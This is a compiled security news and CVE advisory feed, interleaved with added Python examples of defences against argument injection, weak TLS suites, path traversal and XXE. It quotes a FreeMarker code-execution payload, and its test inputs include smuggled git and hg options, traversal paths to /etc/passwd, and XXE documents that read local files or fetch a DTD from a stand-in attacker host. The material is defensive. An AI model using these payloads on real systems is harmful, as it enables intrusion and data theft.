Conti Ransomware Group Diaries, Part III: Weaponry
via "Krebs on Security".
Part I of this series examined newly leaked internal chats from the Conti ransomware group, and how the crime gang dealt with its own internal breaches. Part II explored what it's like to be an employee of Conti's sprawling organization. Today's Part III looks at how Conti abused a panoply of popular commercial security services to undermine the security of its targets, as well as how the team's leaders strategized for the upper hand in ransom negotiations with victims.
CVE-2022-26484
via "National Vulnerability Database".
An issue was discovered in Veritas InfoScale Operations Manager (VIOM) before 7.4.2 Patch 600 and 8.x before 8.0.0 Patch 100. The web server fails to sanitize input to admin/cgi-bin/rulemgr.pl/getfile/, allowing a remote authenticated administrator to read arbitrary files on the system via directory traversal. By supplying an absolute path as the resource name in a GET request, an attacker can read arbitrary files on the filesystem, including application source code, configuration files, and critical system files.
CVE-2021-3737
via "National Vulnerability Database".
A flaw was found in Python. An improperly handled HTTP response in the http.client module may allow a remote attacker who controls the HTTP server to make the client script enter an infinite loop, consuming CPU time. The highest threat from this vulnerability is to system availability.
CVE-2022-26483
via "National Vulnerability Database".
An issue was discovered in Veritas InfoScale Operations Manager (VIOM) before 7.4.2 Patch 600 and 8.x before 8.0.0 Patch 100. A reflected cross-site scripting (XSS) vulnerability in admin/cgi-bin/listdir.pl allows authenticated remote administrators to inject arbitrary web script or HTML via an HTTP GET parameter that is reflected in the response without sanitization.
CVE-2021-27757
via "National Vulnerability Database".
Insecure password storage issue. The application stores sensitive information in cleartext within a resource that might be accessible to another control sphere. Since the information is stored in cleartext, attackers could potentially read it and gain access to sensitive information.
CVE-2021-3656
via "National Vulnerability Database".
A flaw was found in KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the "virt_ext" field, this issue could allow a malicious L1 to disable both the VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, a leak of sensitive data, or a potential guest-to-host escape.
CVE-2022-25106
via "National Vulnerability Database".
D-Link DIR-859 v1.05 was discovered to contain a stack-based buffer overflow via the function genacgi_main. This vulnerability allows attackers to cause a denial of service (DoS) via a crafted payload.
CVE-2022-23915
via "National Vulnerability Database".
All versions of the weblate package before 4.11.1 are vulnerable to remote code execution (RCE) via argument injection when using git or mercurial repositories. Authenticated users can change the behavior of the application in an unintended way by supplying values that the VCS command line interprets as options, leading to command execution.
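Argument injection of this kind arises when a user-controlled value (repository URL, branch, target directory) reaches git or hg in a position where the option parser may read it as a flag. The guard below is an added example, not Weblate's code; the allow-list pattern, the argv shapes and the sample values are choices made here. It refuses option-like values outright and inserts `--` so that URL and destination are always parsed as positional arguments.

```python
import re


class ArgumentInjection(ValueError):
    """Raised when a user-supplied value would be read as a VCS option."""


# Constructed allow-list for branch/revision names. git and hg both treat a
# leading '-' as an option; '..' and a '.lock' suffix are invalid in git refs.
_REF_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._/-]{0,254}$")


def check_positional(value: str, what: str) -> str:
    """Accept a value only if it cannot be mistaken for an option."""
    if value.startswith("-"):
        raise ArgumentInjection(f"{what} {value!r} looks like an option")
    if any(c in value for c in "\x00\r\n"):
        raise ArgumentInjection(f"{what} contains control characters")
    return value


def check_ref(value: str) -> str:
    """Branch/revision names get the stricter allow-list on top."""
    check_positional(value, "ref")
    if not _REF_RE.match(value) or ".." in value or value.endswith(".lock"):
        raise ArgumentInjection(f"ref {value!r} is not an acceptable branch name")
    return value


def git_clone_argv(url: str, branch: str, dest: str) -> list:
    """argv for `git clone`; '--' ends option parsing, so url and dest stay positional."""
    return ["git", "clone", "--branch", check_ref(branch), "--",
            check_positional(url, "url"), check_positional(dest, "dest")]


def hg_clone_argv(url: str, branch: str, dest: str) -> list:
    """Same shape for Mercurial, whose '--config' is the classic injection primitive."""
    return ["hg", "clone", "--rev", check_ref(branch), "--",
            check_positional(url, "url"), check_positional(dest, "dest")]


def unsafe_git_clone_argv(url: str, branch: str, dest: str) -> list:
    """The shape being fixed: unchecked values land wherever the option parser puts them."""
    return ["git", "clone", "--branch", branch, url, dest]


def is_rejected(builder, *args) -> bool:
    """True if the builder refuses the supplied values."""
    try:
        builder(*args)
    except ArgumentInjection:
        return True
    return False


if __name__ == "__main__":
    # Constructed hostile inputs: an option smuggled in as the URL, and as the hg revision.
    evil_url = "--upload-pack=touch /tmp/pwned"
    print("unsafe argv:", unsafe_git_clone_argv(evil_url, "main", "work"))
    print("guarded:", is_rejected(git_clone_argv, evil_url, "main", "work"))
    print("hg guarded:", is_rejected(hg_clone_argv, "https://example.invalid/r",
                                     "--config=alias.clone=!id", "work"))
```

Run the resulting argv with `subprocess.run(argv)` (never through a shell). The `--` separator only addresses option parsing; which URL schemes are acceptable (for instance, only `https://`) is a separate allow-list that this guard does not replace.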
CVE-2022-0855
via "National Vulnerability Database".
Improper Resolution of Path Equivalence in GitHub repository microweber-dev/whmcs_plugin prior to 0.0.4.
Most Cybersecurity Vendors at Risk Due to Internet-Exposed IT Assets
via "Dark Reading".
Study shows more than 97% have exposed assets on AWS, among a wide range of other issues.
Companies Can't Just Train Their Way to More Secure Endpoints
via "Dark Reading".
Criminals will keep stealing end-user credentials despite employee awareness, so organizations need high-tech solutions as well.
More Than 70% of SOC Analysts Experiencing Burnout
via "Dark Reading".
Nearly 65% of security operations center (SOC) analysts are likely to change jobs in the next year, survey shows.
Massive Meris Botnet Embeds Ransomware Notes from REvil
via "Threat Post".
Notes threatening to tank targeted companies' stock prices were embedded in the URLs of the DDoS requests as text strings addressed to CEOs and web-operations staff.
CVE-2021-46353
via "National Vulnerability Database".
An information disclosure in the web interface of D-Link DIR-X1860 before 1.03 RevA1 allows a remote unauthenticated attacker to send a specially crafted HTTP request and learn absolute filesystem paths used by the web application.
CVE-2021-46384
via "National Vulnerability Database".
MCMS (https://gitee.com/mingSoft/MCMS) <= 5.2.5 is affected by remote code execution. The impact is arbitrary code execution (remote). The attack vector is a FreeMarker template expression such as ${"freemarker.template.utility.Execute"?new()("calc")}. MCMS has a pre-authentication RCE vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise MCMS. Successful exploitation can result in takeover of MCMS.
CVE-2021-44827
via "National Vulnerability Database".
There is remote authenticated OS command injection on TP-Link Archer C20i 0.9.1 3.2 v003a.0 Build 170221 Rel.55462n devices via the X_TP_ExternalIPv6Address HTTP parameter, allowing a remote attacker to run arbitrary commands on the router with root privileges.
CVE-2021-40846
via "National Vulnerability Database".
An issue was discovered in Rhinode Trading Paints through 2.0.36. TP Updater.exe uses cleartext HTTP to check for and request updates. An attacker in a man-in-the-middle position can therefore substitute a malicious binary for the real update; because the channel is not TLS-protected, the victim sees no certificate errors or warnings.
CVE-2021-27756
via "National Vulnerability Database".
TLS-RSA cipher suites are not disabled in BigFix Compliance up to v2.0.5. Unless TLS 1.2 with forward-secret cipher suites is enforced, an attacker can passively record traffic and later decrypt it once the server's RSA private key is obtained, since static RSA key exchange offers no forward secrecy.
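As an added example, not BigFix code: the check below uses Python's ssl module to audit an SSLContext for enabled suites that still use static RSA key exchange, and shows a configuration that enforces TLS 1.2 or later with ephemeral key exchange only. The cipher strings and the "permissive" context are constructed for the demonstration; the detection keys off OpenSSL's own cipher description, which reports the key-exchange algorithm as `Kx=RSA` for the TLS-RSA family.

```python
from __future__ import annotations

import re
import ssl

# OpenSSL's cipher description carries the key-exchange field: 'Kx=RSA' marks
# static RSA key exchange, 'Kx=ECDH'/'Kx=DH' the ephemeral suites, 'Kx=any' TLS 1.3.
_RSA_KX = re.compile(r"\bKx=RSA(?!\w)")


def is_rsa_key_exchange(description: str) -> bool:
    """True for a cipher description whose key exchange is static RSA."""
    return bool(_RSA_KX.search(description))


def rsa_key_exchange_suites(ctx: ssl.SSLContext) -> list[str]:
    """Names of enabled suites without forward secrecy (the TLS-RSA family)."""
    return [c["name"] for c in ctx.get_ciphers() if is_rsa_key_exchange(c["description"])]


def forward_secret_only(ctx: ssl.SSLContext) -> bool:
    """Audit result: no static-RSA suite is offered."""
    return not rsa_key_exchange_suites(ctx)


def permissive_context() -> ssl.SSLContext:
    """Roughly the state the advisory describes: RSA key-exchange suites still offered."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.set_ciphers("ECDHE+AESGCM:RSA+AESGCM:RSA+AES")  # constructed weak cipher string
    return ctx


def hardened_context() -> ssl.SSLContext:
    """TLS 1.2 or later; ephemeral (EC)DHE key exchange and AEAD ciphers only."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    # TLS 1.3 suites are not governed by set_ciphers() and are always forward secret.
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM:!aNULL:!eNULL")
    return ctx


if __name__ == "__main__":
    for label, ctx in (("permissive", permissive_context()), ("hardened", hardened_context())):
        print(f"{label}: RSA key-exchange suites =", rsa_key_exchange_suites(ctx) or "none")
```

The same audit works on a server: capture the cipher list offered in a ServerHello across a scan, or run `openssl ciphers -v` against the configured string, and treat any `Kx=RSA` entry as recorded-now-decrypted-later exposure.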
CVE-2021-43590
via "National Vulnerability Database".
Dell EMC Enterprise Storage Analytics for vRealize Operations, versions 4.0.1 to 6.2.1, contain a plaintext password storage vulnerability. A local, highly privileged malicious user may potentially exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application with the privileges of the compromised account.
CVE-2021-32008
via "National Vulnerability Database".
This issue affects Secomea GateManager version 9.6.621421014 and all prior versions. Improper limitation of a pathname to a restricted directory (path traversal) allows a logged-in GateManager admin to delete system files or directories.
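Path traversal (the VIOM arbitrary file read and this GateManager deletion) and path equivalence (the whmcs_plugin entry) share one defence: resolve the user-supplied name against the served root after decoding, and refuse anything that lands outside it. The helper below is an added example, not code from any of those products; the directory layout it builds and the sample names are constructed for the demonstration.

```python
from __future__ import annotations

import os
import tempfile
from pathlib import Path


class PathEscape(ValueError):
    """Raised when a user-supplied name would resolve outside the served root."""


def resolve_under_root(root: str | os.PathLike, user_path: str) -> Path:
    """Map an untrusted relative name onto a file inside `root`, or refuse.

    Checks, in order:
      * reject NUL bytes (truncation tricks in C-backed APIs);
      * reject absolute paths, the primitive used against VIOM;
      * resolve both sides (following symlinks, collapsing '..', '.' and
        duplicate separators, i.e. the path-equivalence cases) and require the
        target to be the root itself or strictly beneath it.
    Run this after URL-decoding, so %2e%2e%2f has already become ../.
    """
    if "\x00" in user_path:
        raise PathEscape("NUL byte in path")
    candidate = Path(user_path)
    if candidate.is_absolute() or candidate.drive or candidate.anchor:
        raise PathEscape(f"absolute path refused: {user_path!r}")
    root_real = Path(root).resolve(strict=True)
    target = (root_real / candidate).resolve(strict=False)
    try:
        target.relative_to(root_real)
    except ValueError:
        raise PathEscape(f"{user_path!r} escapes {root_real}") from None
    return target


def build_fixture() -> Path:
    """Constructed layout: a served root, a sibling 'outside' dir, a symlink between them."""
    base = Path(tempfile.mkdtemp())
    root, outside = base / "www", base / "outside"
    (root / "sub").mkdir(parents=True)
    outside.mkdir()
    (root / "ok.txt").write_text("public")
    (outside / "secret.txt").write_text("secret")
    try:
        (root / "link").symlink_to(outside / "secret.txt")
    except OSError:
        pass  # platforms without symlink privilege simply skip that case
    return root


def classify(root: Path, names: list[str]) -> dict:
    """'ok:<relative path>' or 'rejected' for each candidate name."""
    root_real = Path(root).resolve()
    out = {}
    for name in names:
        try:
            out[name] = "ok:" + str(resolve_under_root(root, name).relative_to(root_real))
        except PathEscape:
            out[name] = "rejected"
    return out


SAMPLE_NAMES = ["ok.txt", "./ok.txt", "sub/../ok.txt", "../outside/secret.txt",
                "sub/../../outside/secret.txt", "/etc/passwd", "link"]


def demo() -> dict:
    """Build the fixture and classify the constructed sample names."""
    root = build_fixture()
    result = classify(root, SAMPLE_NAMES)
    if not (root / "link").is_symlink():
        result["link"] = "skipped"
    return result


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name!r:32} -> {verdict}")
```

Note that `sub/../ok.txt` is accepted: it is equivalent to `ok.txt`, which is inside the root, so rejecting on the mere presence of `..` would be both too strict and, against encodings the filter does not know about, too weak. Deciding on the resolved path is what closes the equivalence class.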
CVE-2022-25312
via "National Vulnerability Database".
An XML external entity (XXE) injection vulnerability was discovered in the Any23 RDFa XSLTStylesheet extractor and is known to affect Any23 versions before 2.7. XXE is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to read files on the application server's filesystem and to interact with any back-end or external systems that the application itself can reach. This issue is fixed in Apache Any23 2.7.
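As an added example, not Any23's parser: the usual hardening against XXE is to refuse DOCTYPE declarations before parsing at all, since external entities, parameter entities and entity-expansion bombs all need a DTD. The snippet uses Python's stdlib expat binding as a probe and then parses with ElementTree; the XML samples are constructed and none come from the Any23 report.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


class DtdRejected(ValueError):
    """Raised when a document carries a DOCTYPE; DTDs are where XXE lives."""


def parse_xml_without_dtd(data: bytes) -> ET.Element:
    """Parse untrusted XML, refusing any DOCTYPE before the real parse.

    A dedicated expat probe fires on the DOCTYPE start and aborts, so no entity
    declaration inside it is ever processed; only DTD-free documents reach
    ElementTree.
    """
    probe = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected(
            f"DOCTYPE {name!r} refused (system id {sysid!r}, "
            f"internal subset: {bool(has_internal_subset)})")

    probe.StartDoctypeDeclHandler = on_doctype
    # Belt and braces: should a DOCTYPE ever get past the handler above,
    # returning 0 here makes expat fail instead of fetching the external entity.
    probe.ExternalEntityRefHandler = lambda context, base, sysid, pubid: 0
    probe.Parse(data, True)  # raises DtdRejected or expat.ExpatError
    return ET.fromstring(data)


def parse_outcome(data: bytes) -> str:
    """'ok:<root tag>' or the class of refusal, for reporting and testing."""
    try:
        return "ok:" + parse_xml_without_dtd(data).tag
    except DtdRejected:
        return "rejected:dtd"
    except (expat.ExpatError, ET.ParseError):
        return "rejected:malformed"


# Constructed samples, shaped like the XHTML+RDFa an extractor of this kind consumes.
BENIGN = b"""<?xml version="1.0"?>
<html xmlns="http://www.w3.org/1999/xhtml"><body><p about="#x" property="dc:title">T</p></body></html>"""

XXE_FILE = b"""<?xml version="1.0"?>
<!DOCTYPE html [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<html><body>&xxe;</body></html>"""

XXE_PARAMETER = b"""<?xml version="1.0"?>
<!DOCTYPE html [<!ENTITY % dtd SYSTEM "http://attacker.invalid/evil.dtd"> %dtd;]>
<html><body>x</body></html>"""

BILLION_LAUGHS = b"""<?xml version="1.0"?>
<!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">]>
<lolz>&lol2;</lolz>"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("xxe file", XXE_FILE),
                       ("xxe parameter entity", XXE_PARAMETER), ("billion laughs", BILLION_LAUGHS)):
        print(f"{label:22} -> {parse_outcome(doc)}")
```

Rejecting the DOCTYPE outright is the right default for machine-to-machine XML; if a feed legitimately needs a DTD, the fallback is a parser configured to never load external entities and with entity-expansion limits, which is a weaker position than never entering the DTD at all.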